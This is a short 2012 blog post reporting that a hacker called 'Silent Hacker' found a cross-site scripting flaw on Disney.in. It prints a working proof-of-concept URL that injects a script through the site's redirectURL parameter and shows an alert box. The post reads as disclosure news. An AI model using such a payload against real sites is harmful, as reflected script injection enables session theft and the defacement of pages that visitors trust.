Monday 9 April 2012

XSS vulnerability in Disney.in, found by Silent Hacker




A Hacker calling himself "Silent Hacker" discovered XSS vulnerability in Disney websites.  The Disney.in website is found to be vulnerable to Cross site scripting.

POC:


http://www.disney.in/DisneyOnline/j/redirect.jsp?redirectURL=%22%3E%3Cscript%3Ealert%28%22XssEd%20By%20SilenT%20HaXoR%22%29%3C/script%3E

No comments:

Post a Comment